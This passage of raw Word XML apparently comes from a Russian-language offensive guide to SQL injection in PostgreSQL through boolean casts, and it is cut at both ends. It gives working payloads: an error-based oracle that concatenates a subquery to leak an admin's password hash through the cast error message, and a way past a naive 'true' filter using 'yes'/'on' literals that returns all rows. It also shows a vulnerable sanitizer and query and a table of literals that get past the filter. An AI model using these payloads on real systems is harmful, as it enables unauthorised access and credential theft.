      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer-bypass через широкий namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фильтр, блокирующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'true'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'yes'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'on'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'y'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t'</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий проходит через альтернативную форму.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B686C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short-circuit confusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE active = '$x' AND id = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ломает cast — ошибка происходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Атакующий узнаёт, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>active = '&lt;его-leak&gt;'::boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пытался выполниться — это сам по себе oracle: вызов произошёл при определённых условиях короткозамыкания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5091BFB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — error-based oracle через invalid boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273B595" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-cast и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-cast (классические error-based — см. 3.2). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> неявный — пишется кодом приложения, не приходит из payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09C529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый запрос (из 3.11.0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD79EF"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is_active = '&lt;is_active&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B8D9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — BOOLEAN. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;is_active&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что-то, чего не парсится как bool, PG падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid input syntax for type boolean: "&lt;значение&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Значение попадает в текст ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дословно</w:t>
      </w:r>
      <w:r>
        <w:t>, что превращает его в leak-канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E944D98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71BBB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' || (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AA90D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D744EA1"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is_active = 'x' || (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F980E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG вычисляет правую часть: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'x' || (subquery)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкатенация. Subquery возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'$2b$12$abc...xyz'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bcrypt hash). Получается строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'x$2b$12$abc...xyz'</w:t>
      </w:r>
      <w:r>
        <w:t>, которую PG пытается cast в BOOLEAN и падает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD22476" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR:  invalid input syntax for type boolean: "x$2b$12$abc...xyz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD8BED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINE 1: SELECT * FROM users WHERE is_active = 'x' || (SELECT password_...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DBA65"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4964907A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Текст ошибки попадает в HTTP-ответ приложения (через 500 status или через debug-страницу FastAPI) — атакующий читает hash напрямую. Идентично 3.2.x по механике, но через BOOLEAN-cast вместо INT-cast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320785B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Длина leaked-значения ограничена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\d+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>varchar(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-полей (если конкатенация переполнит — PG обрежет). Bcrypt hash (60 символов) укладывается в практически любой error message buffer (PG лимит — 1024 байта в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без модификатора; ошибка cast — без лимита, выводит всё).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A19ECF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — sanitizer-bypass через альтернативные bool-литералы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04566988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: sanitizer блокирует подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'true'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (наивный анти-tautology фильтр), но колонка BOOLEAN допускает 5 других литералов для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B4354" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2947A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def sanitize_inp(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736F78B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if "true" in value.lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C37D92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        raise HTTPException(400, "no 'true' allowed")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4F711" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69774DBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE7AEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># в эндпоинте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE5DBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inp = sanitize_inp(request.args["filter"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F09BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = text(f"SELECT * FROM users WHERE is_admin = '{inp}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20751E55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48195CB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yes' OR is_admin = 'on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100707BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0B207"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is_admin = 'yes' OR is_admin = 'on'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137AA49E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG cast-ит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'yes'::boolean → true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'on'::boolean → true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. WHERE становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true OR true = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — возвращает все строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6309EE6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативы для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>-замены: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45AB128A"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F0CD22C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Литерал</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9E79E26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Результат cast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2AB6389F"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F2FFFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'t'</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536E2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="05F5BAFB"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A6ECCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'true'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D7416D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true (заблокирован sanitizer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3B8CBA8B"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12F47E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'yes'</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3A6049" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="673C1B3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DD4129" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'y'</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19937D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="72488C9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EC1F84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'on'</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81AFF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1B5CAA4A"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467257" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'1'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9D6C9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3114340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FD980C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'TRUE'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
